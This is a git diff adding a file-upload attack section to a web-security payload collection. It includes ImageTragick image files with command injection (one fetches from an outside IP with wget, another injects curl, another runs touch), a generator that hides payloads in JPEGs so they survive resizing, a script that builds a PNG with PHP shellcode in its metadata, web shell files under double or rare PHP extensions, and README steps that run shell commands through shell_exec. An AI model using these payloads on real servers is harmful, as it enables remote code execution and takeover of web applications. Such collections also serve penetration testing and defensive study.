diff --git a/README.md b/README.md
index 094b93c..6831bc4 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-# PayloadsAllTheThings
+# Payloads All The Things
A list of every usefull payloads and bypass for Web Application Security
TODO:
@@ -6,7 +6,6 @@ TODO:
* Upload
* Traversal Directory
* Tar
-* SSRF
* PHP Serialization
* CSV Injection
@@ -14,5 +13,6 @@ To improve:
* RCE
* SQL injection
* XXE
+* SSRF
# /!\ Work in Progress : 1%
diff --git a/Upload/Image Tragik/detection_port_localhost_http.jpg b/Upload/Image Tragik/detection_port_localhost_http.jpg
new file mode 100755
index 0000000..0735ca9
--- /dev/null
+++ b/Upload/Image Tragik/detection_port_localhost_http.jpg
@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(http://localhost:PORT/)'
+pop graphic-context
diff --git a/Upload/Image Tragik/image_magik_reverse_shell.xml b/Upload/Image Tragik/image_magik_reverse_shell.xml
new file mode 100755
index 0000000..3d0b4c2
--- /dev/null
+++ b/Upload/Image Tragik/image_magik_reverse_shell.xml
@@ -0,0 +1,9 @@
+
+
+
\ No newline at end of file
diff --git a/Upload/Image Tragik/payload-http-log.png b/Upload/Image Tragik/payload-http-log.png
new file mode 100755
index 0000000..a215d25
--- /dev/null
+++ b/Upload/Image Tragik/payload-http-log.png
@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "92.222.81.2)'
+pop graphic-context
diff --git a/Upload/Image Tragik/payload_rce_touch.jpg b/Upload/Image Tragik/payload_rce_touch.jpg
new file mode 100755
index 0000000..78c2298
--- /dev/null
+++ b/Upload/Image Tragik/payload_rce_touch.jpg
@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)'
+pop graphic-context
diff --git a/Upload/Image Tragik/payload_rce_wget.gif b/Upload/Image Tragik/payload_rce_wget.gif
new file mode 100755
index 0000000..1c0ee01
--- /dev/null
+++ b/Upload/Image Tragik/payload_rce_wget.gif
@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 92.222.81.2:1337 > /dev/null`'
+pop graphic-context
diff --git a/Upload/JPG Resize/README.txt b/Upload/JPG Resize/README.txt
new file mode 100755
index 0000000..633f383
--- /dev/null
+++ b/Upload/JPG Resize/README.txt
@@ -0,0 +1,5 @@
+# How to use
+b.php?c=ls
+
+
+Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
\ No newline at end of file
diff --git a/Upload/JPG Resize/bulletjpg.py b/Upload/JPG Resize/bulletjpg.py
new file mode 100755
index 0000000..77951db
--- /dev/null
+++ b/Upload/JPG Resize/bulletjpg.py
@@ -0,0 +1,128 @@
+#!/usr/bin/python
+
+"""
+
+ Bulletproof Jpegs Generator
+ Copyright (C) 2012 Damien "virtualabs" Cauquil
+
+ This program is free software; you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation; either version 2 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License along
+ with this program; if not, write to the Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+"""
+
+import struct,sys,os
+import gd
+from StringIO import StringIO
+from random import randint,shuffle
+from time import time
+
+# image width/height (square)
+N = 32
+
+
+def insertPayload(_in, _out, payload,off):
+ """
+ Payload insertion (quick JPEG parsing and patching)
+ """
+ img = _in
+ # look for 'FF DA' (SOS)
+ sos = img.index("\xFF\xDA")
+ sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
+ sod = sos_size+2
+ # look for 'FF D9' (EOI)
+ eoi = img[sod:].index("\xFF\xD9")
+ # enough size ?
+ if (eoi - sod - off)>=len(payload):
+ _out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
+ return True
+ else:
+ return False
+
+if __name__=='__main__':
+
+ print "[+] Virtualabs' Nasty bulletproof Jpeg generator"
+ print " | website: http://virtualabs.fr"
+ print " | contact: virtualabs -at- gmail -dot- com"
+ print ""
+
+ payloads = ["","","",""]
+
+ # make sure the exploit-jpg directory exists or create it
+ if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'):
+ print "[!] Please remove the file named 'exploit-jpg' from the current directory"
+ elif not os.path.exists('exploit-jpg'):
+ os.mkdir('exploit-jpg')
+
+ # start generation
+ print '[i] Generating ...'
+ for q in range(50,100)+[-1]:
+ # loop over every payload
+ for p in payloads:
+ # not done yet
+ done = False
+ start = time()
+ # loop while not done and timeout not reached
+ while not done and (time()-start)<10.0:
+
+ # we create a NxN pixels image, true colors
+ img = gd.image((N,N),True)
+ # we create a palette
+ pal = []
+ for i in range(N*N):
+ pal.append(img.colorAllocate((randint(0,256),randint(0,256),randint(0,256))))
+ # we shuffle this palette
+ shuffle(pal)
+ # and fill the image with it
+ pidx = 0
+ for x in range(N):
+ for y in range(N):
+ img.setPixel((x,y),pal[pidx])
+ pidx+=1
+
+ # write down the image
+ out_jpg = StringIO('')
+ img.writeJpeg(out_jpg,q)
+ out_raw = out_jpg.getvalue()
+
+ # now, we try to insert the payload various ways
+ for i in range(64):
+ test_jpg = StringIO('')
+ if insertPayload(out_raw,test_jpg,p,i):
+ try:
+ # write down the new jpeg file
+ f = open('exploit-jpg/exploit-%d.jpg'%q,'wb')
+ f.write(test_jpg.getvalue())
+ f.close()
+
+ # load it with GD
+ test = gd.image('exploit-jpg/exploit-%d.jpg'%q)
+ final_jpg = StringIO('')
+ test.writeJpeg(final_jpg,q)
+ final_raw = final_jpg.getvalue()
+ # does it contain our payload ?
+ if p in final_raw:
+ # Yay !
+ print '[i] Jpeg quality %d ... DONE'%q
+ done = True
+ break
+ except IOError,e:
+ pass
+ else:
+ break
+ if not done:
+ # payload not found, we remove the file
+ os.unlink('exploit-jpg/exploit-%d.jpg'%q)
+ else:
+ break
+
\ No newline at end of file
diff --git a/Upload/JPG Resize/exploit--1.jpg b/Upload/JPG Resize/exploit--1.jpg
new file mode 100755
index 0000000..05fc5e1
Binary files /dev/null and b/Upload/JPG Resize/exploit--1.jpg differ
diff --git a/Upload/JPG Resize/exploit-52.jpg b/Upload/JPG Resize/exploit-52.jpg
new file mode 100755
index 0000000..f149d94
Binary files /dev/null and b/Upload/JPG Resize/exploit-52.jpg differ
diff --git a/Upload/JPG Resize/exploit-53.jpg b/Upload/JPG Resize/exploit-53.jpg
new file mode 100755
index 0000000..7103e0e
Binary files /dev/null and b/Upload/JPG Resize/exploit-53.jpg differ
diff --git a/Upload/JPG Resize/exploit-54.jpg b/Upload/JPG Resize/exploit-54.jpg
new file mode 100755
index 0000000..c454dee
Binary files /dev/null and b/Upload/JPG Resize/exploit-54.jpg differ
diff --git a/Upload/JPG Resize/exploit-55.jpg b/Upload/JPG Resize/exploit-55.jpg
new file mode 100755
index 0000000..6955c3a
Binary files /dev/null and b/Upload/JPG Resize/exploit-55.jpg differ
diff --git a/Upload/JPG Resize/exploit-56.jpg b/Upload/JPG Resize/exploit-56.jpg
new file mode 100755
index 0000000..30479c8
Binary files /dev/null and b/Upload/JPG Resize/exploit-56.jpg differ
diff --git a/Upload/JPG Resize/exploit-57.jpg b/Upload/JPG Resize/exploit-57.jpg
new file mode 100755
index 0000000..0633c9b
Binary files /dev/null and b/Upload/JPG Resize/exploit-57.jpg differ
diff --git a/Upload/JPG Resize/exploit-58.jpg b/Upload/JPG Resize/exploit-58.jpg
new file mode 100755
index 0000000..e9357de
Binary files /dev/null and b/Upload/JPG Resize/exploit-58.jpg differ
diff --git a/Upload/JPG Resize/exploit-59.jpg b/Upload/JPG Resize/exploit-59.jpg
new file mode 100755
index 0000000..8ccd2e1
Binary files /dev/null and b/Upload/JPG Resize/exploit-59.jpg differ
diff --git a/Upload/JPG Resize/exploit-60.jpg b/Upload/JPG Resize/exploit-60.jpg
new file mode 100755
index 0000000..e541cdd
Binary files /dev/null and b/Upload/JPG Resize/exploit-60.jpg differ
diff --git a/Upload/JPG Resize/exploit-61.jpg b/Upload/JPG Resize/exploit-61.jpg
new file mode 100755
index 0000000..0c32026
Binary files /dev/null and b/Upload/JPG Resize/exploit-61.jpg differ
diff --git a/Upload/JPG Resize/exploit-62.jpg b/Upload/JPG Resize/exploit-62.jpg
new file mode 100755
index 0000000..f3144db
Binary files /dev/null and b/Upload/JPG Resize/exploit-62.jpg differ
diff --git a/Upload/JPG Resize/exploit-63.jpg b/Upload/JPG Resize/exploit-63.jpg
new file mode 100755
index 0000000..978d5d7
Binary files /dev/null and b/Upload/JPG Resize/exploit-63.jpg differ
diff --git a/Upload/JPG Resize/exploit-64.jpg b/Upload/JPG Resize/exploit-64.jpg
new file mode 100755
index 0000000..d6bb05c
Binary files /dev/null and b/Upload/JPG Resize/exploit-64.jpg differ
diff --git a/Upload/JPG Resize/exploit-65.jpg b/Upload/JPG Resize/exploit-65.jpg
new file mode 100755
index 0000000..406801d
Binary files /dev/null and b/Upload/JPG Resize/exploit-65.jpg differ
diff --git a/Upload/JPG Resize/exploit-66.jpg b/Upload/JPG Resize/exploit-66.jpg
new file mode 100755
index 0000000..04a4c53
Binary files /dev/null and b/Upload/JPG Resize/exploit-66.jpg differ
diff --git a/Upload/JPG Resize/exploit-67.jpg b/Upload/JPG Resize/exploit-67.jpg
new file mode 100755
index 0000000..61aa5c6
Binary files /dev/null and b/Upload/JPG Resize/exploit-67.jpg differ
diff --git a/Upload/JPG Resize/exploit-68.jpg b/Upload/JPG Resize/exploit-68.jpg
new file mode 100755
index 0000000..b5525e8
Binary files /dev/null and b/Upload/JPG Resize/exploit-68.jpg differ
diff --git a/Upload/JPG Resize/exploit-69.jpg b/Upload/JPG Resize/exploit-69.jpg
new file mode 100755
index 0000000..63b046b
Binary files /dev/null and b/Upload/JPG Resize/exploit-69.jpg differ
diff --git a/Upload/JPG Resize/exploit-70.jpg b/Upload/JPG Resize/exploit-70.jpg
new file mode 100755
index 0000000..24a2e01
Binary files /dev/null and b/Upload/JPG Resize/exploit-70.jpg differ
diff --git a/Upload/JPG Resize/exploit-71.jpg b/Upload/JPG Resize/exploit-71.jpg
new file mode 100755
index 0000000..b81b241
Binary files /dev/null and b/Upload/JPG Resize/exploit-71.jpg differ
diff --git a/Upload/JPG Resize/exploit-72.jpg b/Upload/JPG Resize/exploit-72.jpg
new file mode 100755
index 0000000..64dae94
Binary files /dev/null and b/Upload/JPG Resize/exploit-72.jpg differ
diff --git a/Upload/JPG Resize/exploit-73.jpg b/Upload/JPG Resize/exploit-73.jpg
new file mode 100755
index 0000000..58f8c2d
Binary files /dev/null and b/Upload/JPG Resize/exploit-73.jpg differ
diff --git a/Upload/JPG Resize/exploit-74.jpg b/Upload/JPG Resize/exploit-74.jpg
new file mode 100755
index 0000000..57c10ff
Binary files /dev/null and b/Upload/JPG Resize/exploit-74.jpg differ
diff --git a/Upload/JPG Resize/exploit-75.jpg b/Upload/JPG Resize/exploit-75.jpg
new file mode 100755
index 0000000..224738b
Binary files /dev/null and b/Upload/JPG Resize/exploit-75.jpg differ
diff --git a/Upload/JPG Resize/exploit-76.jpg b/Upload/JPG Resize/exploit-76.jpg
new file mode 100755
index 0000000..2b2bc38
Binary files /dev/null and b/Upload/JPG Resize/exploit-76.jpg differ
diff --git a/Upload/JPG Resize/exploit-77.jpg b/Upload/JPG Resize/exploit-77.jpg
new file mode 100755
index 0000000..3b2b2c5
Binary files /dev/null and b/Upload/JPG Resize/exploit-77.jpg differ
diff --git a/Upload/JPG Resize/exploit-78.jpg b/Upload/JPG Resize/exploit-78.jpg
new file mode 100755
index 0000000..0027333
Binary files /dev/null and b/Upload/JPG Resize/exploit-78.jpg differ
diff --git a/Upload/JPG Resize/exploit-79.jpg b/Upload/JPG Resize/exploit-79.jpg
new file mode 100755
index 0000000..eead64d
Binary files /dev/null and b/Upload/JPG Resize/exploit-79.jpg differ
diff --git a/Upload/JPG Resize/exploit-80.jpg b/Upload/JPG Resize/exploit-80.jpg
new file mode 100755
index 0000000..5f1a2f8
Binary files /dev/null and b/Upload/JPG Resize/exploit-80.jpg differ
diff --git a/Upload/JPG Resize/exploit-81.jpg b/Upload/JPG Resize/exploit-81.jpg
new file mode 100755
index 0000000..644fb2f
Binary files /dev/null and b/Upload/JPG Resize/exploit-81.jpg differ
diff --git a/Upload/JPG Resize/exploit-82.jpg b/Upload/JPG Resize/exploit-82.jpg
new file mode 100755
index 0000000..d219eea
Binary files /dev/null and b/Upload/JPG Resize/exploit-82.jpg differ
diff --git a/Upload/JPG Resize/exploit-83.jpg b/Upload/JPG Resize/exploit-83.jpg
new file mode 100755
index 0000000..4f99d48
Binary files /dev/null and b/Upload/JPG Resize/exploit-83.jpg differ
diff --git a/Upload/JPG Resize/exploit-84.jpg b/Upload/JPG Resize/exploit-84.jpg
new file mode 100755
index 0000000..0913b78
Binary files /dev/null and b/Upload/JPG Resize/exploit-84.jpg differ
diff --git a/Upload/JPG Resize/exploit-85.jpg b/Upload/JPG Resize/exploit-85.jpg
new file mode 100755
index 0000000..3ab8a9f
Binary files /dev/null and b/Upload/JPG Resize/exploit-85.jpg differ
diff --git a/Upload/JPG Resize/exploit-86.jpg b/Upload/JPG Resize/exploit-86.jpg
new file mode 100755
index 0000000..6b17541
Binary files /dev/null and b/Upload/JPG Resize/exploit-86.jpg differ
diff --git a/Upload/JPG Resize/exploit-87.jpg b/Upload/JPG Resize/exploit-87.jpg
new file mode 100755
index 0000000..ab386cb
Binary files /dev/null and b/Upload/JPG Resize/exploit-87.jpg differ
diff --git a/Upload/JPG Resize/exploit-88.jpg b/Upload/JPG Resize/exploit-88.jpg
new file mode 100755
index 0000000..0290756
Binary files /dev/null and b/Upload/JPG Resize/exploit-88.jpg differ
diff --git a/Upload/JPG Resize/exploit-89.jpg b/Upload/JPG Resize/exploit-89.jpg
new file mode 100755
index 0000000..f7e067b
Binary files /dev/null and b/Upload/JPG Resize/exploit-89.jpg differ
diff --git a/Upload/JPG Resize/exploit-90.jpg b/Upload/JPG Resize/exploit-90.jpg
new file mode 100755
index 0000000..1371229
Binary files /dev/null and b/Upload/JPG Resize/exploit-90.jpg differ
diff --git a/Upload/JPG Resize/exploit-91.jpg b/Upload/JPG Resize/exploit-91.jpg
new file mode 100755
index 0000000..9809587
Binary files /dev/null and b/Upload/JPG Resize/exploit-91.jpg differ
diff --git a/Upload/JPG Resize/exploit-92.jpg b/Upload/JPG Resize/exploit-92.jpg
new file mode 100755
index 0000000..5b213e5
Binary files /dev/null and b/Upload/JPG Resize/exploit-92.jpg differ
diff --git a/Upload/JPG Resize/exploit-93.jpg b/Upload/JPG Resize/exploit-93.jpg
new file mode 100755
index 0000000..17746e9
Binary files /dev/null and b/Upload/JPG Resize/exploit-93.jpg differ
diff --git a/Upload/JPG Resize/exploit-94.jpg b/Upload/JPG Resize/exploit-94.jpg
new file mode 100755
index 0000000..22253d7
Binary files /dev/null and b/Upload/JPG Resize/exploit-94.jpg differ
diff --git a/Upload/JPG Resize/exploit-95.jpg b/Upload/JPG Resize/exploit-95.jpg
new file mode 100755
index 0000000..4dbdb4a
Binary files /dev/null and b/Upload/JPG Resize/exploit-95.jpg differ
diff --git a/Upload/JPG Resize/exploit-96.jpg b/Upload/JPG Resize/exploit-96.jpg
new file mode 100755
index 0000000..e5d7da5
Binary files /dev/null and b/Upload/JPG Resize/exploit-96.jpg differ
diff --git a/Upload/JPG Resize/exploit-97.jpg b/Upload/JPG Resize/exploit-97.jpg
new file mode 100755
index 0000000..bb6b08f
Binary files /dev/null and b/Upload/JPG Resize/exploit-97.jpg differ
diff --git a/Upload/JPG Resize/exploit-98.jpg b/Upload/JPG Resize/exploit-98.jpg
new file mode 100755
index 0000000..8a4c53f
Binary files /dev/null and b/Upload/JPG Resize/exploit-98.jpg differ
diff --git a/Upload/Metadata GIF/shell_cinema.gif b/Upload/Metadata GIF/shell_cinema.gif
new file mode 100755
index 0000000..398d27c
Binary files /dev/null and b/Upload/Metadata GIF/shell_cinema.gif differ
diff --git a/Upload/Metadata GIF/shell_fr.gif b/Upload/Metadata GIF/shell_fr.gif
new file mode 100755
index 0000000..10ce64b
Binary files /dev/null and b/Upload/Metadata GIF/shell_fr.gif differ
diff --git a/Upload/Metadata GIF/shell_problem.gif b/Upload/Metadata GIF/shell_problem.gif
new file mode 100755
index 0000000..1379a50
Binary files /dev/null and b/Upload/Metadata GIF/shell_problem.gif differ
diff --git a/Upload/Metadata PNG/Build_image_to_LFI.py b/Upload/Metadata PNG/Build_image_to_LFI.py
new file mode 100755
index 0000000..2bef83f
--- /dev/null
+++ b/Upload/Metadata PNG/Build_image_to_LFI.py
@@ -0,0 +1,30 @@
+from PIL import Image
+
+# Shellcodes - Bypass included : Keyword Recognition : System, GET, php
+# --- How to use : http://localhost/shell.php?c=echo%20'
';ls
+
+#shellcode = ""
+# --- How to use : http://localhost/shell.php?_=system&__=echo%20'
';ls
+shellcode2 = ";').($_^'/');?>"
+
+
+print "\n[+] Advanced Upload - Shell inside metadatas of a PNG file"
+
+# Create a backdoored PNG
+print " - Creating a payload.png"
+im = Image.new("RGB", (10,10), "Black")
+im.info["shell"] = shellcode
+reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')
+
+# undocumented class
+from PIL import PngImagePlugin
+meta = PngImagePlugin.PngInfo()
+
+# copy metadata into new object
+for k,v in im.info.iteritems():
+ if k in reserved: continue
+ meta.add_text(k, v, 0)
+im.save("payload.png", "PNG", pnginfo=meta)
+
+print "Done"
\ No newline at end of file
diff --git a/Upload/Metadata PNG/php_exif_data.png b/Upload/Metadata PNG/php_exif_data.png
new file mode 100755
index 0000000..edad263
Binary files /dev/null and b/Upload/Metadata PNG/php_exif_data.png differ
diff --git a/Upload/PHP Extension/Shell.jpeg.php b/Upload/PHP Extension/Shell.jpeg.php
new file mode 100755
index 0000000..b1abb37
--- /dev/null
+++ b/Upload/PHP Extension/Shell.jpeg.php
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/Upload/PHP Extension/Shell.pht b/Upload/PHP Extension/Shell.pht
new file mode 100755
index 0000000..b1abb37
--- /dev/null
+++ b/Upload/PHP Extension/Shell.pht
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/Upload/PHP Extension/Shell.phtml b/Upload/PHP Extension/Shell.phtml
new file mode 100755
index 0000000..b1abb37
--- /dev/null
+++ b/Upload/PHP Extension/Shell.phtml
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/Upload/PHP Extension/Shell.png.php b/Upload/PHP Extension/Shell.png.php
new file mode 100755
index 0000000..b1abb37
--- /dev/null
+++ b/Upload/PHP Extension/Shell.png.php
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/Upload/PHP Extension/Shell.shtml b/Upload/PHP Extension/Shell.shtml
new file mode 100755
index 0000000..b1abb37
--- /dev/null
+++ b/Upload/PHP Extension/Shell.shtml
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/Upload/PHP Extension/shell.pgif b/Upload/PHP Extension/shell.pgif
new file mode 100755
index 0000000..10ce64b
Binary files /dev/null and b/Upload/PHP Extension/shell.pgif differ
diff --git a/Upload/PNG Resize/110x110_resize_bypass_use_LFI.png b/Upload/PNG Resize/110x110_resize_bypass_use_LFI.png
new file mode 100755
index 0000000..b0b9ed0
Binary files /dev/null and b/Upload/PNG Resize/110x110_resize_bypass_use_LFI.png differ
diff --git a/Upload/PNG Resize/32x32_resize_bypass_use_LFI.png b/Upload/PNG Resize/32x32_resize_bypass_use_LFI.png
new file mode 100755
index 0000000..845c145
Binary files /dev/null and b/Upload/PNG Resize/32x32_resize_bypass_use_LFI.png differ
diff --git a/Upload/README.md b/Upload/README.md
index c707ab4..798f239 100644
--- a/Upload/README.md
+++ b/Upload/README.md
@@ -1,12 +1,43 @@
-# Title
-Lorem
-
-## Vuln
+# Upload
+Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
+## Exploits
+Image Tragik
```
-Code
+HTTP Request
+Reverse Shell
+Touch command
+```
+
+
+PHP Extension
+```
+.php
+
+Less known extension
+.pht
+.pgif
+.phtml
+.shtml
+
+Double extension
+.jpeg.php
+.png.php
+```
+
+
+PNG Bypass a resize - Upload the picture and use a local file inclusion
+```
+You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
+curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
+curl 'http://localhost/test.php?0=system' --data "1='ls'"
+```
+
+
+JPG Bypass a resize - Upload the picture and use a local file inclusion
+```
+http://localhost/test.php?c=ls
```
## Thanks to
-* Lorem
-* Ipsum
\ No newline at end of file
+* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
\ No newline at end of file